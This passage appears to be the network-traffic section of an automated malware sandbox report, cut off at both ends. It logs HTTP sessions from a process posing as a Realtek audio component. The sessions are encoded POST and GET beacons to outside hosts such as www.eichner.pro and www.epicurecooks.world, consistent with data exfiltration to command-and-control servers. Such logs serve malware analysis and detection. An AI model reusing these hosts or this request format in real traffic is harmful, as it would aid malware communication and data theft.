                                                                                                                                                                                                                                Data Ascii: pluxVm=/U+nYUa3gaCuOZH37YBUjkfPN1+iZ7UzTNmNVlrwWv2JuqnDaqZKCamvhS6cuRLTAgam9SErO7pNotsiyThcwIiHNDVHVUCZ5Rw9sNTCZXdpxv0PSOsLD/ed3SRe+0xBANRBi3Kvl8rVXR8RrsNbieGuoS6u5+tgVPhloglmwQUG4t1nQNsQdIXeWcFa6v/mYMxFqlELi435FXU07K6rfG7oT7xGQUGIvqxNLFvOCO7kS2cnuOJfNXrjuGtCw0lCjGrOzlJ/BrGHnJlS21fDD35Et7bAnq5iiWTIqO6aIxBR9Pobol24Yh/che/q65WcbMtVhuLD8bXg25KQJXxtnPUNf8pbp5CfqkGMV19Wx2DhbafigfPi8AtD+llVsEDAazN8lFXxaU0P8MQ/fOXIYZ1Y9KFdvl2B4csLuBdNXnVUajmDPXg7w52QwYGDtciwCqeBOiG3cUya1ebEqKTnAnR8H7rUMfFTf010AuovWMipkb+KcxnsIshj5V1a1auMoG7Awx7Sdo7a2mV36l2H89SKsh/M7hvVHwug3JUYXDiSBote3m5WElRHJM/gUUPNevWD7jd6PpzqGKSeQwFZBbCK1PvJkpOijXAaAYmQVkTRKVuyPmtOqP1c/r86cFaoMIzPSQNlY52hN2R9UF746ow/9cGHB7gszD7RVlAV9xsUtQrERKOIotMvQAHeYmsp6qLK83bCXnwgJQbpHbehpaGhZ7l04/QQsegaX/1+aDIexqdQ6ZKCWxpgTuC1iEaWXAjQxNbQsIrlj6OFYewCJ8Jf/nzRzmetg/JohXeZ5fh31DrbW0mH+GPhyCwifrETZQv6Ab8Y7PIidOfAmBeM40ulJ8NggIGf9q/B9ubK5j4H+PWtkCwtWBH2/jpBROyC3xgCNBvhjVPFLHkpsIHyyymJIoMR4B9C2JBc0uzHYCz37IZXdg0e60CG6fZuMBKGm/6wYDLLLrcIOG36c2B13oCeT6Y/uvzgsjjbOP+WVji0r [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:52:31.454447985 CET2440OUTData Raw: 31 62 6b 74 33 69 78 6d 48 4b 71 56 31 64 4f 39 79 67 30 30 52 50 55 58 48 5a 57 77 41 77 46 67 2f 65 64 33 37 31 66 6b 6d 37 71 30 49 47 39 31 31 53 39 63 5a 58 36 72 54 4b 4b 32 5a 62 51 73 78 58 50 33 62 37 61 36 77 6b 34 6b 5a 45 2f 78 6d 67
                                                                                                                                                                                                                                Data Ascii: 1bkt3ixmHKqV1dO9yg00RPUXHZWwAwFg/ed371fkm7q0IG911S9cZX6rTKK2ZbQsxXP3b7a6wk4kZE/xmgXxYGLj6vYTo0KLDk/nWWWak5UnMEjzStjeLJfxODAKWVQgtsATeT9Bcdr+ezrDLEPmY/VP1zPqBBqElEZZxOknlLQR/qR8P+5XvHphG+c6S8Eseeg2JIyiKOOYv54xKlHe0/m+03moEcETbRWuIp2jZHle7VDTV38
                                                                                                                                                                                                                                Dec 3, 2024 14:52:31.454464912 CET2987OUTData Raw: 37 55 68 78 30 6a 52 55 55 52 35 6d 4a 67 47 6c 50 46 50 57 78 68 33 75 71 53 4f 42 4a 77 70 59 78 38 59 44 48 39 35 36 4c 43 37 30 67 38 4c 55 4d 4e 62 57 50 4c 32 65 64 45 59 48 32 4c 50 49 67 6d 41 77 79 77 57 6e 53 30 65 4f 51 61 41 58 4e 67
                                                                                                                                                                                                                                Data Ascii: 7Uhx0jRUUR5mJgGlPFPWxh3uqSOBJwpYx8YDH956LC70g8LUMNbWPL2edEYH2LPIgmAwywWnS0eOQaAXNgttZuaCARiTZuPv60HoZEs2fLYsCPexvd+wBi28h93Ex3Mya10ybp2AA0garhVMRnH/VNLENnFGCxrXTNFkzbmZk1ur4gbP6t11CMNUW7N3Q+B42szcRxqRlq/vzRaNvnmtMvHb4RGLZSp1fvlaM9TpUz/UZBybSg0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                16192.168.11.2049775208.91.197.27807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.124768972 CET425OUTGET /mdkc/?pluxVm=yWWHbhCahbG3DdaBnt9NrGvMUCSQc4g2Tqe6SUjOSsODgr6CFa5SJdyjtzT5mznodS2lvT8/GpN3gvUqymh3/8TyFQ0rIiTFrx443/jhZTAx0fULTMMcMck=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.epicurecooks.world
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.872580051 CET997INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:34 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                                Set-Cookie: vsid=911vr4807795543428155; expires=Sun, 02-Dec-2029 13:52:34 GMT; Max-Age=157680000; path=/; domain=www.epicurecooks.world; HttpOnly
                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Qc4AuhigFg8r2P44Ahsh8bwNmEM1XOJ/2JxY7rqUyl9lnNqfVsEL9tG1PBe14SfEyJewSt5/6EqiUIq8XQ0z/A==
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.872597933 CET186INData Raw: 39 66 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c
                                                                                                                                                                                                                                Data Ascii: 9f96<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link r
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.872620106 CET1220INData Raw: 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70
                                                                                                                                                                                                                                Data Ascii: el="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)|
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.872634888 CET1220INData Raw: 69 6e 64 6f 77 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 5b 62 5d 2e 6c 29 7d 7d 7d 72 65 74 75 72 6e 20 61 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 6c 61 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65
                                                                                                                                                                                                                                Data Ascii: indow.cmp_customlanguages[b].l)}}}return a};window.cmp_getlang=function(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs(
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.872883081 CET1220INData Raw: 61 72 20 62 3d 22 5f 65 6e 22 3b 69 66 28 22 63 6d 70 5f 67 65 74 6c 61 6e 67 22 20 69 6e 20 68 29 7b 6f 3d 68 2e 63 6d 70 5f 67 65 74 6c 61 6e 67 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 69 66 28 22 63 6d 70 5f 63 75 73 74 6f 6d 6c 61
                                                                                                                                                                                                                                Data Ascii: ar b="_en";if("cmp_getlang" in h){o=h.cmp_getlang().toLowerCase();if("cmp_customlanguages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.872901917 CET1220INData Raw: 70 6b 65 79 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 72 29 3a 22 22 29 2b 28 6e 21 3d 22 22 3f 22 26 63 6d 70 61 74 74 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6e 29 3a 22 22 29 2b 28 22 63 6d 70
                                                                                                                                                                                                                                Data Ascii: pkey="+encodeURIComponent(r):"")+(n!=""?"&cmpatt="+encodeURIComponent(n):"")+("cmp_params" in h?"&"+h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.872916937 CET1220INData Raw: 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 68 65 61 64 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3e 30 29 7b 74 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 7d 7d 7d 29 28 29 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61
                                                                                                                                                                                                                                Data Ascii: length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}})();window.cmp_addFrame=function(b){if(!window.frames[b]){if(document.body){var a=document.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultrabl
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.872931957 CET1220INData Raw: 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 67 65 74 55 53 50 44 61 74 61 22 29 7b 61 5b 32 5d 28 7b 76 65 72 73 69 6f 6e 3a 31 2c 75 73 70 53 74 72 69 6e 67 3a 77 69 6e 64 6f 77 2e 63 6d 70 5f 72 63 28 22 22 29 7d 2c 74 72 75 65 29 7d 65 6c 73
                                                                                                                                                                                                                                Data Ascii: lse{if(a[0]==="getUSPData"){a[2]({version:1,uspString:window.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.016438961 CET1220INData Raw: 67 65 74 47 50 50 44 61 74 61 22 29 7b 72 65 74 75 72 6e 7b 73 65 63 74 69 6f 6e 49 64 3a 33 2c 67 70 70 56 65 72 73 69 6f 6e 3a 31 2c 73 65 63 74 69 6f 6e 4c 69 73 74 3a 5b 5d 2c 61 70 70 6c 69 63 61 62 6c 65 53 65 63 74 69 6f 6e 73 3a 5b 30 5d
                                                                                                                                                                                                                                Data Ascii: getGPPData"){return{sectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.016459942 CET1220INData Raw: 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28
                                                                                                                                                                                                                                Data Ascii: :{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typ
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.016685009 CET1220INData Raw: 62 6c 65 75 73 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 75 73 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 75 73 70 61 70 69 22 29 7d 69 66 28 21 28 22 63
                                                                                                                                                                                                                                Data Ascii: bleusp" in window)||!window.cmp_disableusp){window.cmp_setStub("__uspapi")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="text/ja


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                17192.168.11.204977689.31.143.90807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:52:40.760699987 CET677OUTPOST /og0p/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.eichner.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.eichner.pro
                                                                                                                                                                                                                                Referer: http://www.eichner.pro/og0p/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 58 61 6c 54 36 59 48 55 64 5a 6a 78 45 4d 34 71 72 79 76 73 52 31 70 6d 4d 72 64 4a 72 32 71 31 63 7a 7a 66 42 6c 51 4b 55 66 77 7a 33 39 62 7a 6a 38 65 35 46 5a 4d 35 50 4b 47 6b 7a 68 52 4b 31 33 74 6b 7a 51 6e 51 51 66 67 4e 4c 42 48 47 41 58 47 52 55 38 75 49 50 69 59 73 79 56 4f 52 2f 4e 4e 55 4f 70 6f 48 6c 36 75 69 68 4f 36 70 61 39 72 45 65 32 66 47 6c 31 6f 74 76 4c 75 2f 41 47 36 4b 4b 6d 41 62 54 6d 53 74 69 71 74 49 50 45 69 6f 2f 57 6e 70 6a 45 55 65 78 46 31 69 78 77 72 7a 4f 48 6b 6f 33 73 43 6b 39 4a 72 6a 44 4b 67 59 34 45 6a 6b 44 63 68 63 65 59 6e 43 6f 51 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=XalT6YHUdZjxEM4qryvsR1pmMrdJr2q1czzfBlQKUfwz39bzj8e5FZM5PKGkzhRK13tkzQnQQfgNLBHGAXGRU8uIPiYsyVOR/NNUOpoHl6uihO6pa9rEe2fGl1otvLu/AG6KKmAbTmStiqtIPEio/WnpjEUexF1ixwrzOHko3sCk9JrjDKgY4EjkDchceYnCoQ==
                                                                                                                                                                                                                                Dec 3, 2024 14:52:40.954447031 CET333INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:40 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: UD Webspace 3.2
                                                                                                                                                                                                                                Allow: GET, POST, HEAD
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                18192.168.11.204977789.31.143.90807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:52:43.482830048 CET697OUTPOST /og0p/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.eichner.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.eichner.pro
                                                                                                                                                                                                                                Referer: http://www.eichner.pro/og0p/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 58 61 6c 54 36 59 48 55 64 5a 6a 78 46 70 6f 71 6e 7a 76 73 55 56 70 68 44 4c 64 4a 79 47 71 35 63 7a 2f 66 42 6e 39 42 55 70 49 7a 30 5a 4c 7a 69 35 71 35 4c 35 4d 35 48 71 47 62 33 68 51 47 31 33 68 73 7a 55 6e 51 51 5a 4d 4e 4c 42 33 47 41 67 61 53 47 63 75 47 57 53 59 69 39 31 4f 52 2f 4e 4e 55 4f 70 38 35 6c 36 32 69 68 2b 4b 70 61 63 71 32 64 32 65 30 6f 6c 6f 74 72 4c 76 30 41 47 36 53 4b 69 5a 30 54 67 57 74 69 76 70 49 50 57 4b 72 77 57 6e 72 6e 45 56 73 2f 58 64 73 31 69 62 36 50 55 38 54 32 75 44 62 78 2f 6d 35 65 34 55 38 37 58 2f 57 48 73 59 30 63 61 6d 5a 31 58 61 6a 55 6a 41 78 36 65 73 76 36 39 66 69 47 6d 68 59 2f 72 41 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=XalT6YHUdZjxFpoqnzvsUVphDLdJyGq5cz/fBn9BUpIz0ZLzi5q5L5M5HqGb3hQG13hszUnQQZMNLB3GAgaSGcuGWSYi91OR/NNUOp85l62ih+Kpacq2d2e0olotrLv0AG6SKiZ0TgWtivpIPWKrwWnrnEVs/Xds1ib6PU8T2uDbx/m5e4U87X/WHsY0camZ1XajUjAx6esv69fiGmhY/rA=
                                                                                                                                                                                                                                Dec 3, 2024 14:52:43.683319092 CET333INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:43 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: UD Webspace 3.2
                                                                                                                                                                                                                                Allow: GET, POST, HEAD
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                19192.168.11.204977889.31.143.90807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:52:46.209362030 CET2578OUTPOST /og0p/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.eichner.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.eichner.pro
                                                                                                                                                                                                                                Referer: http://www.eichner.pro/og0p/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 58 61 6c 54 36 59 48 55 64 5a 6a 78 46 70 6f 71 6e 7a 76 73 55 56 70 68 44 4c 64 4a 79 47 71 35 63 7a 2f 66 42 6e 39 42 55 70 41 7a 30 72 44 7a 69 65 32 35 49 35 4d 35 4a 4b 47 61 33 68 51 4c 31 32 4a 6f 7a 55 69 74 51 61 34 4e 49 6a 2f 47 47 55 75 53 4d 63 75 47 65 79 59 76 79 56 50 56 2f 4e 64 51 4f 70 73 35 6c 36 32 69 68 38 53 70 63 4e 71 32 62 32 66 47 6c 31 6f 58 76 4c 76 63 41 43 57 6f 4b 69 56 65 54 51 32 74 6a 50 35 49 49 6c 69 72 39 57 6e 74 67 45 56 30 2f 58 41 75 31 69 47 46 50 52 6f 31 32 70 58 62 37 2b 58 5a 43 70 78 68 74 48 76 56 45 73 51 33 54 36 4f 37 34 45 4f 6b 45 6a 73 71 6b 4c 49 6b 38 4e 4c 43 44 33 4e 7a 69 66 71 41 4e 69 4b 78 69 44 2f 76 44 72 4c 31 5a 44 33 70 67 4c 47 54 65 37 4c 59 67 30 65 68 41 69 70 4a 58 6f 61 34 71 39 77 39 5a 52 77 31 56 4d 6a 4f 35 71 72 52 63 7a 59 50 62 34 53 7a 77 39 59 4e 66 47 55 43 37 70 2b 2b 33 76 68 57 55 46 75 71 41 36 76 75 41 36 57 42 33 6f 53 50 68 35 79 70 6e 31 39 6d 77 50 39 74 61 51 68 4a 38 63 33 47 78 37 6e [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=XalT6YHUdZjxFpoqnzvsUVphDLdJyGq5cz/fBn9BUpAz0rDzie25I5M5JKGa3hQL12JozUitQa4NIj/GGUuSMcuGeyYvyVPV/NdQOps5l62ih8SpcNq2b2fGl1oXvLvcACWoKiVeTQ2tjP5IIlir9WntgEV0/XAu1iGFPRo12pXb7+XZCpxhtHvVEsQ3T6O74EOkEjsqkLIk8NLCD3NzifqANiKxiD/vDrL1ZD3pgLGTe7LYg0ehAipJXoa4q9w9ZRw1VMjO5qrRczYPb4Szw9YNfGUC7p++3vhWUFuqA6vuA6WB3oSPh5ypn19mwP9taQhJ8c3Gx7n3aZmbgpsOH2Hoiw1jBO8aJ1dpeafpwsyqik39A0Xt72KFIQHCHGA3oylD6w6LxFpGzyRvb/awk1ADw7yr3BposNcqGyBgWp0o2sE/C/G3GJ/H4gIEBv4B+xRiQhKPkvYgW/HBzedCSUjO6PXK76nH/VQwj7i3O636v3EwRPBv8fWlnbwedCM72Wiq1L9Z1sgXL5gBkMRN3fbfqupQRAYoEMBIDQSBwQyjiouSjjcmy/3IWN7MYonmNZ62vF69Z4mNG5vqDOI+RX1M9PQA4BYYXu1CnnnpumiTMmDHVxiFcK6lx3pHU0AOgMKhkW+qeDXV0H6mabVgKFmEC3yLLmEq22pAyj8lTghUxsen9QjYxTh94PLuddnAjSvA4pVeGtKmE69lxA9IUGzQarVoPNZtlq7bGzlDRWat9aqLfv032/lT4PVL78ndNVCtVJ1T/iOy1OLMV0v8MRj+NlLH28TVgLrlI85xQ70eNIXGWaD6IS9r8wNN2VN8rIAJ6iHpt9f3/sBxf4pmJTTjHpHJ7KhEwONIWqUepsuz0ZGKgqeJiVa7wCzCr6RIPvugKBe8SkxZ4UkB9cNfproRoJOzXlPCQEJWl2x5+YKHTSedTFBu3JE/ErbcQoO58MfkZw8sna2Ug9xtHybTMlV/1QdH99E6owFGc3KSlOTEi [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:52:46.209451914 CET5268OUTData Raw: 78 63 4f 53 79 4c 31 4b 49 64 52 59 6c 7a 70 50 66 76 6d 33 6d 6c 45 63 4e 52 4a 2b 56 6d 4f 57 6a 37 6b 6e 4a 52 6c 57 66 56 5a 4a 51 57 4e 42 64 66 74 62 70 74 55 2f 63 6a 6b 57 4e 59 6a 66 64 32 39 78 36 34 35 70 76 6f 6e 6b 38 62 39 34 78 53
                                                                                                                                                                                                                                Data Ascii: xcOSyL1KIdRYlzpPfvm3mlEcNRJ+VmOWj7knJRlWfVZJQWNBdftbptU/cjkWNYjfd29x645pvonk8b94xSpJwYaxyFBKX96lzXs1dd8P/jgIPeF/la0/2I1VYFfpO/oj4ni47RKU0esYunwq9WGrHzKiXC3qTR4g+vDkVC2Xd3G4QE/CzmPfahPUzPerp0uY1D9m4O2t/JrERy2di3GVkL/DX5eChROL/wjqUO28tSPdIZGn6vF
                                                                                                                                                                                                                                Dec 3, 2024 14:52:46.402591944 CET333INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:46 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: UD Webspace 3.2
                                                                                                                                                                                                                                Allow: GET, POST, HEAD
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                20192.168.11.204977989.31.143.90807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
